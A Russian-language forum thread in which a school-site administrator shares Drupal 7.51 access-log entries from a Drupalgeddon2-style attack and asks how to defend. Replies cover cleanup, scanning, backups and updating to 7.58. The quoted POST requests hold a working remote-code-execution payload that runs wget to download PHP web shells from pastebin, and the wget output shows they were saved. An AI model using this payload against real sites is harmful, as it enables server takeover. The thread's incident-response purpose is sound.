Ядро 7.51 было
(сейчас обновился до 7.58, поможет ли это обновление?)
"POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=wget+-O+RxR__yuwshxvmkota.php+%27https%3A%2F%2Fpastebin.com%2Fraw%2FEU5eF9Lx%27
"POST /?q=file%2Fajax%2Fname%2F%23value%2Fform-MJJ_aI6H7wGkC3wIpZ56o1yRYdnVSGOhONMbUrRMQSQ
"POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=wget+-O+RxR__dyejfxaonpbk.php+%27https%3A%2F%2Fpastebin.com%2Fraw%2FEU5eF9Lx%27
Результат:
--2018-04-21 05:56:31-- https://pastebin.com/raw/EU5eF9Lx
Resolving pastebin.com... 104.20.209.21, 104.20.208.21
Connecting to pastebin.com|104.20.209.21|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: `RxR__yuwshxvmkota.php'0K 51.3M=0s
2018-04-21 05:56:31 (51.3 MB/s) - `RxR__yuwshxvmkota.php' saved [751]
--2018-04-21 05:56:32-- https://pastebin.com/raw/3s8gLhBu
Resolving pastebin.com... 104.20.209.21, 104.20.208.21
Connecting to pastebin.com|104.20.209.21|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: `yE.php'0K ....... 37.4M=0s
2018-04-21 05:56:32 (37.4 MB/s) - `yE.php' saved [8000]
Как можно защититься от этого?
По тому что оставляют, это группа RxR с Йемен. (сайт школьный)
Вроде как уязвимость закрыта в 7.58
https://vulners.com/openvas/OPENVAS:1361412562310108438
Комментарии
Грохнуть все файлы. Залить чистые. Потом пройтись утилиткой ai-bolit.
Кроме того посмотреть пользователей и сбросить права. Посмотреть базу на предмет пхп-кода.
Гляньте недавние темы:
Один из вариантов очистки уже зараженного сайта такой:
Плохой вариант. Потому что:
- бывают ложноположительные срабатывания
- бывает что несрабатывает
Любые антивирусные утилиты это лишь ДОПОЛНИТЕЛЬНОЕ средство.
Ну это само собой, не панацея - после заливки шелла в принципе гарантировать ничего нельзя, надо очень внимательно все проверять. В идеале, конечно, восстановиться из бекапа, снятого до инцидента или откатиться через git, если есть возможность и обновить ядро. Описаный выше вариант скорее для случаев когда надо оперативно сайт вернуть в рабочее состояние.
Сайт чистый
Особо ничего сделать не могли,
- заливали свои пару пхп скриптов только
- ломали index.php (пытались внедрить свои код)
при обновлении до 7.58 заменяется все файла кроме папки sites (где в папке загрузки не было обнаружено посторонних файлов и на всякий случай восстановлен с бэкапа)
БД не затронута, таблице с кэшами почищены.